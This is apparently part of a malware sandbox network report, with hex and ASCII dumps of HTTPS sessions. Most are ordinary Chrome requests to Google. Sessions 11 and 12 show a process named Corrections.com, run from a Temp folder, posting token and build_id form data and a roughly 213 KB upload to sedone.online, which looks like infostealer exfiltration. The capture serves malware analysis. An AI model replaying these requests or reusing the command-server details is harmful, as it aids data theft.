                                                                                                                                                                                                                                                  Data Ascii: 3a3J2TVpLbDJZMmE2K25OeGEvSTVGL1hGazJkMHlxek9rcXFxNnJrRGtmQXZmM1A3QTRmcDVoVVFSektyS3NpaGdHRmpZNDNOeFdBM1ozU3V5cFR6S2tlbGVuSXFqSmFXb3JNeHpPZFptYW8yZkVtSkE3c1hiOHZTV0JMSGh5MkxGRlZGQ29vVlZGZ0FMQURCZ3hTQUFwMWlXbmhtS21hR09RcmZTWFVHMk1HanBTMm8wME9yMzJ4ZkJneGxD
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.449815142.250.181.1004434092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:23 GMT
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC372INData Raw: 31 34 62 30 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                  Data Ascii: 14b0)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                  Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                  Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                  Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC762INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                  Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC724INData Raw: 32 63 64 0d 0a 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 31 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 42 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 43 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 34 64 20 67 62 5f 44 63 20 67 62 5f 37 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30 30 33 64 72 72 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4e 64 20 67 62 5f
                                                                                                                                                                                                                                                  Data Ascii: 2cd\"\u003e\u003cdiv class\u003d\"gb_1c\"\u003e\u003cdiv class\u003d\"gb_Bc\"\u003e\u003cdiv class\u003d\"gb_Cc\"\u003e\u003ca class\u003d\"gb_4d gb_Dc gb_7d\" aria-label\u003d\"Google\" href\u003d\"/?tab\u003drr\"\u003e\u003cspan class\u003d\"gb_Nd gb_
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC1390INData Raw: 38 30 30 30 0d 0a 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61
                                                                                                                                                                                                                                                  Data Ascii: 80008205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Arra
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC1390INData Raw: 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a
                                                                                                                                                                                                                                                  Data Ascii: Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:invalid#z
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC1390INData Raw: 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f
                                                                                                                                                                                                                                                  Data Ascii: 03dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?vo
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC1390INData Raw: 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65 2e 68 61 73 4f 77
                                                                                                                                                                                                                                                  Data Ascii: a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je.hasOw


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  10192.168.2.449816142.250.181.1004434092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:23 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:23 GMT
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                  2024-12-17 16:29:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  11192.168.2.449833116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:27 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----2NY5P8Q9RQIMYUSJEU3W
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 505
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:27 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------2NY5P8Q9RQIMYUSJEU3WContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------2NY5P8Q9RQIMYUSJEU3WContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------2NY5P8Q9RQIMYUSJEU3WCont
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:28 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  12192.168.2.449843116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----OZCB1D2NOP8QIEKFKFK6
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 213453
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 44 32 4e 4f 50 38 51 49 45 4b 46 4b 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 44 32 4e 4f 50 38 51 49 45 4b 46 4b 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 44 32 4e 4f 50 38 51 49 45 4b 46 4b 46 4b 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------OZCB1D2NOP8QIEKFKFK6Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------OZCB1D2NOP8QIEKFKFK6Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------OZCB1D2NOP8QIEKFKFK6Cont
